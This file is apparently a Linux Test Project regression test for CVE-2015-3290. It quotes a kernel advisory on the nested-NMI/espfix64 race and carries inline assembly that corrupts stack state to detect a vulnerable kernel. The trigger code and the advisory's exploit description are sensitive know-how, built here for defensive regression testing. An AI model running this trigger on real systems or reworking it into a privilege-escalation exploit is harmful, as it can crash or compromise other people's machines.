1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3 * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
4 */
5
6 /*
7
8 NOTE: rather than checking for full nested NMI exploitation we simply check
9 that the NMI stack state can be corrupted with this code.
10
11 http://www.openwall.com/lists/oss-security/2015/08/04/8
12
13 > +++++ CVE-2015-3290 +++++
14 >
15 > High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed
16 by:
17 >
18 > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
19 >
20 > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
21 >
22 > You can mitigate CVE-2015-3290 by blocking modify_ldt or
23 > perf_event_open using seccomp. A fully-functional, portable, reliable
24 > exploit is privately available and will be published in a week or two.
25 > *Patch your systems*
26
27 And here's a real advisory:
28
29 If an NMI returns via espfix64 and is interrupted during espfix64 setup
30 by another NMI, the return state is corrupt. This is exploitable for
31 reliable privilege escalation on any Linux x86_64 system in which
32 untrusted code can arrange for espfix64 to be invoked and for NMIs to be
33 nested.
34
35 Glossing over a lot of details, the basic structure of Linux' nested NMI
36 handling is:
37
38 nmi_handler:
39 if (in_nmi) {
40 nmi_latched = true;
41 return;
42 }
43 in_nmi = true;
44 handle the nmi;
45 atomically (this is magic):
46 if (nmi_latched) {
47 nmi_latched = false;
48 start over;
49 } else {
50 in_nmi = false;
51 return and unmask NMIs;
52 }
53
54 Alas, on x86_64, there is no reasonable way to block NMIs to run the
55 atomic part of that pseudocode atomically. Instead, the entire atomic
56 piece is implemented by the single instruction IRET.
57
58 But x86_64 is more broken than just that. The IRET instruction does not
59 restore register state correctly [1] when returning to a 16-bit stack
60 segment. x86_64 has a complicated workaround called espfix64. If
61 espfix64 is invoked on return, a well-behaved IRET is emulated by a
62 complicated scheme that involves manually switching stacks. During the
63 stack switch, there is a window of approximately 19 instructions between
64 the start of espfix64's access to the original stack and when espfix64
65 is done with the original stack. If a nested NMI occurs during this
66 window, then the atomic part of the basic nested NMI algorithm is
67 observably non-atomic.
68
69 Depending on exactly where in this window the nested NMI hits, the
70 results vary. Most nested NMIs will corrupt the return context and
71 crash the calling process. Some are harmless except that the nested NMI
72 gets ignored. There is a two-instruction window in which the return
73 context ends up with user-controlled RIP and CS set to __KERNEL_CS.
74
75 A careful exploit (attached) can recover from all the crashy failures
76 and can regenerate a valid *privileged* state if a nested NMI occurs
77 during the two-instruction window. This exploit appears to work
78 reasonably quickly across a fairly wide range of Linux versions.
79
80 If you have SMEP, this exploit is likely to panic the system. Writing
81 a usable exploit against a SMEP system would be considerably more
82 challenging, but it's surely possible.
83
84 Measures like UDEREF are unlikely to help, because this bug is outside
85 any region that can be protected using paging or segmentation tricks.
86 However, recent grsecurity kernels seem to forcibly disable espfix64, so
87 they're not vulnerable in the first place.
88
89 A couple of notes:
90
91 - This exploit's payload just prints the text "CPL0". The exploit
92 will keep going after printing CPL0 so you can enjoy seeing the
93 frequency with which it wins. Interested parties could easily
94 write different payloads. I doubt that any existing exploit
95 mitigation techniques would be useful against this type of
96 attack.
97
98 - If you are using a kernel older than v4.1, a 64-bit build of the
99 exploit will trigger a signal handling bug and crash. Defenders
100 should not rejoice, because the exploit works fine when build
101 as a 32-bit binary or (so I'm told) as an x32 binary.
102
103 - This is the first exploit I've ever written that contains genuine
104 hexadecimal code. The more assembly-minded among you can have
105 fun figuring out why :)
106
107 [1] By "correctly", I mean that the register state ends up different
108 from that which was saved in the stack frame, not that the
109 implementation doesn't match the spec in the microcode author's minds.
110 The spec is simply broken (differently on AMD and Intel hardware,
111 perhaps unsurprisingly.)
112
113 --Andy
114 */
115
116 #include "config.h"
117 #include "tst_test.h"
118 #include "tst_timer.h"
119
120 #if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))
121
122 #include <stdlib.h>
123 #include <stdio.h>
124 #include <inttypes.h>
125 #include <asm/ldt.h>
126 #include <unistd.h>
127 #include <sys/syscall.h>
128 #include <setjmp.h>
129 #include <signal.h>
130 #include <string.h>
131 #include <sys/wait.h>
132 #include <linux/perf_event.h>
133
134 #include "lapi/syscalls.h"
135 #include "tst_safe_pthread.h"
136
137 /* Abstractions for some 32-bit vs 64-bit differences. */
138 #ifdef __x86_64__
139 # define REG_IP REG_RIP
140 # define REG_SP REG_RSP
141 # define REG_AX REG_RAX
142
143 struct selectors {
144 unsigned short cs, gs, fs, ss;
145 };
146
147 LTP_ATTRIBUTE_UNUSED
ssptr(ucontext_t * ctx)148 static unsigned short *ssptr(ucontext_t *ctx)
149 {
150 struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
151 return &sels->ss;
152 }
153
154 LTP_ATTRIBUTE_UNUSED
csptr(ucontext_t * ctx)155 static unsigned short *csptr(ucontext_t *ctx)
156 {
157 struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
158 return &sels->cs;
159 }
160 #else
161 # define REG_IP REG_EIP
162 # define REG_SP REG_ESP
163 # define REG_AX REG_EAX
164 # define REG_CR2 (REG_SS + 3)
165
166 LTP_ATTRIBUTE_UNUSED
ssptr(ucontext_t * ctx)167 static greg_t *ssptr(ucontext_t *ctx)
168 {
169 return &ctx->uc_mcontext.gregs[REG_SS];
170 }
171
172 LTP_ATTRIBUTE_UNUSED
csptr(ucontext_t * ctx)173 static greg_t *csptr(ucontext_t *ctx)
174 {
175 return &ctx->uc_mcontext.gregs[REG_CS];
176 }
177 #endif
178
179 static volatile long expected_rsp;
180 static int running = 1;
181
set_ldt(void)182 static void set_ldt(void)
183 {
184 /* Boring 16-bit data segment. */
185 const struct user_desc data_desc = {
186 .entry_number = 0,
187 .base_addr = 0,
188 .limit = 0xfffff,
189 .seg_32bit = 0,
190 .contents = 0, /* Data, expand-up */
191 .read_exec_only = 0,
192 .limit_in_pages = 0,
193 .seg_not_present = 0,
194 .useable = 0
195 };
196
197 TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
198 if (TST_RET == -EINVAL) {
199 tst_brk(TCONF | TRERRNO,
200 "modify_ldt: 16-bit data segments are probably disabled");
201 } else if (TST_RET != 0) {
202 tst_brk(TBROK | TRERRNO, "modify_ldt");
203 }
204 }
205
try_corrupt_stack(unsigned short orig_ss)206 static void try_corrupt_stack(unsigned short orig_ss)
207 {
208 #ifdef __x86_64__
209 asm volatile (
210 /* A small puzzle for the curious reader. */
211 "mov $2048, %%rbp \n\t"
212
213 /* Save rsp for diagnostics */
214 "mov %%rsp, %[expected_rsp] \n\t"
215
216 /*
217 * Let 'er rip.
218 */
219 "mov %[ss], %%ss \n\t" /* begin corruption */
220 "movl $1000, %%edx \n\t"
221 "1: decl %%edx \n\t"
222 "jnz 1b \n\t"
223 "mov %%ss, %%eax \n\t" /* grab SS to display */
224
225 /* Did we enter CPL0? */
226 "mov %%cs, %%dx \n\t"
227 "testw $3, %%dx \n\t"
228 "jnz 2f \n\t"
229 "leaq 3f(%%rip), %%rcx \n\t"
230 "movl $0x200, %%r11d \n\t"
231 "sysretq \n\t"
232 "2: \n\t"
233
234 /*
235 * Stop further corruption. We need to check CPL
236 * first because we need RPL == CPL.
237 */
238 "mov %[orig_ss], %%ss \n\t" /* end corruption */
239
240 "subq $128, %%rsp \n\t"
241 "pushfq \n\t"
242 "testl $(1<<9),(%%rsp) \n\t"
243 "addq $136, %%rsp \n\t"
244 "jz 3f \n\t"
245 "cmpl %[ss], %%eax \n\t"
246 "je 4f \n\t"
247 "3: int3 \n\t"
248 "4: \n\t"
249 : [expected_rsp] "=m" (expected_rsp)
250 : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
251 : "rax", "rcx", "rdx", "rbp", "r11", "flags"
252 );
253 #else
254 asm volatile (
255 /* A small puzzle for the curious reader. */
256 "mov %%ebp, %%esi \n\t"
257 "mov $2048, %%ebp \n\t"
258
259 /* Save rsp for diagnostics */
260 "mov %%esp, %[expected_rsp] \n\t"
261
262 /*
263 * Let 'er rip.
264 */
265 "mov %[ss], %%ss \n\t" /* begin corruption */
266 "movl $1000, %%edx \n\t"
267 "1: .byte 0xff, 0xca \n\t" /* decl %edx */
268 "jnz 1b \n\t"
269 "mov %%ss, %%eax \n\t" /* grab SS to display */
270
271 /* Did we enter CPL0? */
272 "mov %%cs, %%dx \n\t"
273 "testw $3, %%dx \n\t"
274 "jnz 2f \n\t"
275 ".code64 \n\t"
276 "leaq 3f(%%rip), %%rcx \n\t"
277 "movl $0x200, %%r11d \n\t"
278 "sysretl \n\t"
279 ".code32 \n\t"
280 "2: \n\t"
281
282 /*
283 * Stop further corruption. We need to check CPL
284 * first because we need RPL == CPL.
285 */
286 "mov %[orig_ss], %%ss \n\t" /* end corruption */
287
288 "pushf \n\t"
289 "testl $(1<<9),(%%esp) \n\t"
290 "addl $4, %%esp \n\t"
291 "jz 3f \n\t"
292 "cmpl %[ss], %%eax \n\t"
293 "je 4f \n\t"
294 "3: int3 \n\t"
295 "4: mov %%esi, %%ebp \n\t"
296 : [expected_rsp] "=m" (expected_rsp)
297 : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
298 : "eax", "ecx", "edx", "esi", "flags"
299 );
300 #endif
301 }
302
perf_event_open(struct perf_event_attr * hw_event,pid_t pid,int cpu,int group_fd,unsigned long flags)303 static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
304 int cpu, int group_fd, unsigned long flags)
305 {
306 int ret;
307
308 ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
309 group_fd, flags);
310 return ret;
311 }
312
313 static int event_mlock_kb;
314 static int max_sample_rate;
315
child_thread(void * arg LTP_ATTRIBUTE_UNUSED)316 static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
317 {
318 long niter = 0;
319 unsigned short orig_ss;
320
321 struct perf_event_attr pe = {
322 .size = sizeof(struct perf_event_attr),
323 .disabled = 0,
324 .exclude_kernel = 0,
325 .exclude_hv = 0,
326 .freq = 1,
327 .sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
328 PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
329 PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
330 };
331 /* Workaround bug in GCC 4.4.7 (CentOS6) */
332 pe.sample_freq = max_sample_rate / 5;
333
334 struct {
335 uint32_t type;
336 uint64_t config;
337 const char *name;
338 } perf_events[] = {
339 {
340 .type = PERF_TYPE_HARDWARE,
341 .config = PERF_COUNT_HW_INSTRUCTIONS,
342 .name = "hw instructions",
343 },
344 {
345 .type = PERF_TYPE_HARDWARE,
346 .config = PERF_COUNT_HW_CACHE_REFERENCES,
347 .name = "hw cache references",
348 },
349 };
350
351 void *perf_mmaps[ARRAY_SIZE(perf_events)];
352 unsigned int i;
353
354 for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
355 int fd;
356
357 pe.type = perf_events[i].type;
358 pe.config = perf_events[i].config;
359
360 fd = perf_event_open(&pe, 0, -1, -1, 0);
361 if (fd == -1) {
362 if (errno == EINVAL || errno == ENOENT ||
363 errno == EBUSY)
364 tst_brk(TCONF | TERRNO,
365 "no hardware counters");
366 else
367 tst_brk(TBROK | TERRNO, "perf_event_open");
368 /* tst_brk exits */
369 }
370
371 perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
372 PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
373 SAFE_CLOSE(fd);
374 }
375
376 asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));
377
378 for (niter = 0; running && niter < 1000*1000*1000L; niter++) {
379
380 try_corrupt_stack(orig_ss);
381
382 /*
383 * If we ended up with IF == 0, there's no easy way to fix
384 * it. Instead, make frequent syscalls to avoid hanging
385 * the system.
386 */
387 syscall(0x3fffffff);
388 }
389
390 for (i = 0; i < ARRAY_SIZE(perf_events); i++)
391 if (perf_mmaps[i] != MAP_FAILED)
392 SAFE_MUNMAP(perf_mmaps[i], 512 * 1024);
393
394 return (void *)niter;
395 }
396
397 #define TIMEOUT (180)
398 #define TIME_TO_GIVEUP (TIMEOUT - 5)
399 #define TIMER_TYPE CLOCK_MONOTONIC
400
do_child(void)401 static void do_child(void)
402 {
403 int i, ncpus;
404 pthread_t *threads;
405 long iter, total_iter = 0;
406
407 tst_res(TINFO, "attempting to corrupt nested NMI stack state");
408
409 set_ldt();
410
411 ncpus = tst_ncpus();
412 threads = SAFE_MALLOC(sizeof(*threads) * ncpus);
413
414 for (i = 0; i < ncpus; i++)
415 SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);
416
417 sleep(TIME_TO_GIVEUP);
418 running = 0;
419
420 for (i = 0; i < ncpus; i++) {
421 SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
422 total_iter += iter;
423 }
424 free(threads);
425
426 tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
427 total_iter);
428 }
429
setup(void)430 static void setup(void)
431 {
432 /*
433 * According to perf_event_open's manpage, the official way of
434 * knowing if perf_event_open() support is enabled is checking for
435 * the existence of the file /proc/sys/kernel/perf_event_paranoid.
436 */
437 if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
438 tst_brk(TCONF, "Kernel doesn't have perf_event support");
439
440 SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
441 "%d", &event_mlock_kb);
442 SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
443 "%d", &max_sample_rate);
444 }
445
run(void)446 static void run(void)
447 {
448 pid_t pid;
449 int status;
450
451
452 pid = SAFE_FORK();
453 if (pid == 0) {
454 do_child();
455 return;
456 }
457
458 SAFE_WAITPID(pid, &status, 0);
459 if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
460 tst_res(TFAIL, "corrupted NMI stack");
461 else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
462 tst_res(WEXITSTATUS(status), "Propogate child status");
463 }
464
465 static struct tst_test test = {
466 .forks_child = 1,
467 .needs_root = 1,
468 .needs_checkpoints = 1,
469 .setup = setup,
470 .timeout = TIMEOUT,
471 .test_all = run,
472 .tags = (const struct tst_tag[]) {
473 {"linux-git", "9b6e6a8334d5"},
474 {"CVE", "2015-3290"},
475 {}
476 }
477 };
478
479 #else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */
480
481 TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");
482
483 #endif
484